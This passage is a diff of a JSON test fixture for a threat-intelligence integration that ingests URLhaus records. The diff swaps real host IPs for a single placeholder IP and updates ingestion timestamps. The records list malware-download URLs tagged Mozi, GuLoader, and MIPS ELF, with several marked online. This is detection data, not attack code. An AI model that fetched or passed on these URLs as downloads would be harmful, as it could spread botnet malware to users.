"{\"id\":\"961299\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961299/\",\"url\":\"http://89.160.20.156:50000/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11898,18 +11898,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.50.226.131:36251/Mozi.m", + "original": "http://89.160.20.156:36251/Mozi.m", "scheme": "http", "port": 36251, - "domain": "115.50.226.131", - "full": "http://115.50.226.131:36251/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36251/Mozi.m" }, - "ip": "115.50.226.131" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693434294Z", - "original": "{\"id\":\"961300\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961300/\",\"url\":\"http://115.50.226.131:36251/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.226.131\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026282200Z", + "original": "{\"id\":\"961300\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961300/\",\"url\":\"http://89.160.20.156:36251/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11947,18 +11947,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.25.134.26:51932/Mozi.m", + "original": "http://89.160.20.156:51932/Mozi.m", "scheme": "http", "port": 51932, - "domain": "116.25.134.26", - "full": "http://116.25.134.26:51932/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:51932/Mozi.m" }, - "ip": "116.25.134.26" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693437500Z", - "original": "{\"id\":\"961301\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961301/\",\"url\":\"http://116.25.134.26:51932/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.25.134.26\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026289200Z", + "original": "{\"id\":\"961301\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961301/\",\"url\":\"http://89.160.20.156:51932/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -11996,18 +11996,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://116.75.197.211:45660/Mozi.m", + "original": "http://89.160.20.156:45660/Mozi.m", "scheme": "http", "port": 45660, - "domain": "116.75.197.211", - "full": "http://116.75.197.211:45660/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45660/Mozi.m" }, - "ip": "116.75.197.211" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693440846Z", - "original": "{\"id\":\"961297\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961297/\",\"url\":\"http://116.75.197.211:45660/Mozi.m\",\"url_status\":\"online\",\"host\":\"116.75.197.211\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026296300Z", + "original": "{\"id\":\"961297\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961297/\",\"url\":\"http://89.160.20.156:45660/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12045,18 +12045,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://112.240.79.242:42478/Mozi.m", + "original": "http://89.160.20.156:42478/Mozi.m", "scheme": "http", "port": 42478, - "domain": "112.240.79.242", - "full": "http://112.240.79.242:42478/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42478/Mozi.m" }, - "ip": "112.240.79.242" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693444183Z", - "original": "{\"id\":\"961298\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961298/\",\"url\":\"http://112.240.79.242:42478/Mozi.m\",\"url_status\":\"online\",\"host\":\"112.240.79.242\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026304700Z", + "original": "{\"id\":\"961298\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961298/\",\"url\":\"http://89.160.20.156:42478/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12094,18 +12094,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://103.243.184.54:50726/Mozi.m", + "original": "http://89.160.20.156:50726/Mozi.m", "scheme": "http", "port": 50726, - "domain": "103.243.184.54", - "full": "http://103.243.184.54:50726/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50726/Mozi.m" }, - "ip": "103.243.184.54" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693447429Z", - "original": "{\"id\":\"961296\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961296/\",\"url\":\"http://103.243.184.54:50726/Mozi.m\",\"url_status\":\"online\",\"host\":\"103.243.184.54\",\"date_added\":\"2021-01-14 19:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026311800Z", + "original": "{\"id\":\"961296\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961296/\",\"url\":\"http://89.160.20.156:50726/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:34:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12143,18 +12143,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://59.99.93.45:40256/i", + "original": "http://89.160.20.156:40256/i", "scheme": "http", "port": 40256, - "domain": "59.99.93.45", - "full": "http://59.99.93.45:40256/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40256/i" }, - "ip": "59.99.93.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693450675Z", - "original": "{\"id\":\"961295\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961295/\",\"url\":\"http://59.99.93.45:40256/i\",\"url_status\":\"offline\",\"host\":\"59.99.93.45\",\"date_added\":\"2021-01-14 19:33:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026318700Z", + "original": "{\"id\":\"961295\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961295/\",\"url\":\"http://89.160.20.156:40256/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:33:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12193,18 +12193,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://182.113.226.63:50971/bin.sh", + "original": "http://89.160.20.156:50971/bin.sh", "scheme": "http", "port": 50971, - "domain": "182.113.226.63", - "full": "http://182.113.226.63:50971/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50971/bin.sh" }, - "ip": "182.113.226.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693454111Z", - "original": "{\"id\":\"961294\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961294/\",\"url\":\"http://182.113.226.63:50971/bin.sh\",\"url_status\":\"online\",\"host\":\"182.113.226.63\",\"date_added\":\"2021-01-14 19:29:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026325600Z", + "original": "{\"id\":\"961294\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961294/\",\"url\":\"http://89.160.20.156:50971/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:29:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12250,7 +12250,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693457247Z", + "ingested": "2021-12-13T08:40:08.026332500Z", "original": "{\"id\":\"961293\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961293/\",\"url\":\"https://realestatederivatives.com.ng/zx/janomo_hfWUGQvSPn0.bin\",\"url_status\":\"online\",\"host\":\"realestatederivatives.com.ng\",\"date_added\":\"2021-01-14 19:24:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -12289,18 +12289,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.169.164:33946/Mozi.m", + "original": "http://89.160.20.156:33946/Mozi.m", "scheme": "http", "port": 33946, - "domain": "59.97.169.164", - "full": "http://59.97.169.164:33946/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33946/Mozi.m" }, - "ip": "59.97.169.164" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693460563Z", - "original": "{\"id\":\"961291\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961291/\",\"url\":\"http://59.97.169.164:33946/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.169.164\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026339400Z", + "original": "{\"id\":\"961291\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961291/\",\"url\":\"http://89.160.20.156:33946/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12338,18 +12338,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://58.249.13.69:39990/Mozi.a", + "original": "http://89.160.20.156:39990/Mozi.a", "scheme": "http", "port": 39990, - "domain": "58.249.13.69", - "full": "http://58.249.13.69:39990/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39990/Mozi.a" }, - "ip": "58.249.13.69" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693463809Z", - "original": "{\"id\":\"961292\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961292/\",\"url\":\"http://58.249.13.69:39990/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.249.13.69\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026346300Z", + "original": "{\"id\":\"961292\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961292/\",\"url\":\"http://89.160.20.156:39990/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12387,18 +12387,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.86.202:60558/Mozi.m", + "original": "http://89.160.20.156:60558/Mozi.m", "scheme": "http", "port": 60558, - "domain": "61.52.86.202", - "full": "http://61.52.86.202:60558/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60558/Mozi.m" }, - "ip": "61.52.86.202" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693467577Z", - "original": "{\"id\":\"961288\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961288/\",\"url\":\"http://61.52.86.202:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.86.202\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026353200Z", + "original": "{\"id\":\"961288\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961288/\",\"url\":\"http://89.160.20.156:60558/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12436,18 +12436,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://61.52.76.45:32989/Mozi.a", + "original": "http://89.160.20.156:32989/Mozi.a", "scheme": "http", "port": 32989, - "domain": "61.52.76.45", - "full": "http://61.52.76.45:32989/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32989/Mozi.a" }, - "ip": "61.52.76.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693470783Z", - "original": "{\"id\":\"961289\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961289/\",\"url\":\"http://61.52.76.45:32989/Mozi.a\",\"url_status\":\"online\",\"host\":\"61.52.76.45\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026360300Z", + "original": "{\"id\":\"961289\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961289/\",\"url\":\"http://89.160.20.156:32989/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12485,18 +12485,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.26.66:52458/Mozi.m", + "original": "http://89.160.20.156:52458/Mozi.m", "scheme": "http", "port": 52458, - "domain": "61.52.26.66", - "full": "http://61.52.26.66:52458/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52458/Mozi.m" }, - "ip": "61.52.26.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693474670Z", - "original": "{\"id\":\"961290\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961290/\",\"url\":\"http://61.52.26.66:52458/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.26.66\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026367300Z", + "original": "{\"id\":\"961290\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961290/\",\"url\":\"http://89.160.20.156:52458/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:22:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12534,18 +12534,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://203.212.246.231:60735/Mozi.m", + "original": "http://89.160.20.156:60735/Mozi.m", "scheme": "http", "port": 60735, - "domain": "203.212.246.231", - "full": "http://203.212.246.231:60735/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60735/Mozi.m" }, - "ip": "203.212.246.231" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693478247Z", - "original": "{\"id\":\"961286\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961286/\",\"url\":\"http://203.212.246.231:60735/Mozi.m\",\"url_status\":\"online\",\"host\":\"203.212.246.231\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026374200Z", + "original": "{\"id\":\"961286\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961286/\",\"url\":\"http://89.160.20.156:60735/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12583,18 +12583,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.104.197:34755/Mozi.m", + "original": "http://89.160.20.156:34755/Mozi.m", "scheme": "http", "port": 34755, - "domain": "186.33.104.197", - "full": "http://186.33.104.197:34755/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34755/Mozi.m" }, - "ip": "186.33.104.197" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693481483Z", - "original": "{\"id\":\"961287\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961287/\",\"url\":\"http://186.33.104.197:34755/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.104.197\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026381100Z", + "original": "{\"id\":\"961287\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961287/\",\"url\":\"http://89.160.20.156:34755/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12632,18 +12632,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://41.86.19.146:39290/Mozi.m", + "original": "http://89.160.20.156:39290/Mozi.m", "scheme": "http", "port": 39290, - "domain": "41.86.19.146", - "full": "http://41.86.19.146:39290/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39290/Mozi.m" }, - "ip": "41.86.19.146" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693485039Z", - "original": "{\"id\":\"961285\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961285/\",\"url\":\"http://41.86.19.146:39290/Mozi.m\",\"url_status\":\"offline\",\"host\":\"41.86.19.146\",\"date_added\":\"2021-01-14 19:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026388Z", + "original": "{\"id\":\"961285\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961285/\",\"url\":\"http://89.160.20.156:39290/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:21:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12681,18 +12681,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.126.86.107:56141/Mozi.m", + "original": "http://89.160.20.156:56141/Mozi.m", "scheme": "http", "port": 56141, - "domain": "182.126.86.107", - "full": "http://182.126.86.107:56141/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56141/Mozi.m" }, - "ip": "182.126.86.107" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693488155Z", - "original": "{\"id\":\"961279\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961279/\",\"url\":\"http://182.126.86.107:56141/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.126.86.107\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026394900Z", + "original": "{\"id\":\"961279\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961279/\",\"url\":\"http://89.160.20.156:56141/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12730,18 +12730,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.117.77.236:40247/Mozi.a", + "original": "http://89.160.20.156:40247/Mozi.a", "scheme": "http", "port": 40247, - "domain": "182.117.77.236", - "full": "http://182.117.77.236:40247/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40247/Mozi.a" }, - "ip": "182.117.77.236" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693502071Z", - "original": "{\"id\":\"961280\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961280/\",\"url\":\"http://182.117.77.236:40247/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.77.236\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026401900Z", + "original": "{\"id\":\"961280\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961280/\",\"url\":\"http://89.160.20.156:40247/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12779,18 +12779,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://61.53.42.182:36619/i", + "original": "http://89.160.20.156:36619/i", "scheme": "http", "port": 36619, - "domain": "61.53.42.182", - "full": "http://61.53.42.182:36619/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36619/i" }, - "ip": "61.53.42.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693508173Z", - "original": "{\"id\":\"961281\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961281/\",\"url\":\"http://61.53.42.182:36619/i\",\"url_status\":\"offline\",\"host\":\"61.53.42.182\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026408800Z", + "original": "{\"id\":\"961281\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961281/\",\"url\":\"http://89.160.20.156:36619/i\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 19:20:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -12828,18 +12828,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.41.141.246:43673/Mozi.m", + "original": "http://89.160.20.156:43673/Mozi.m", 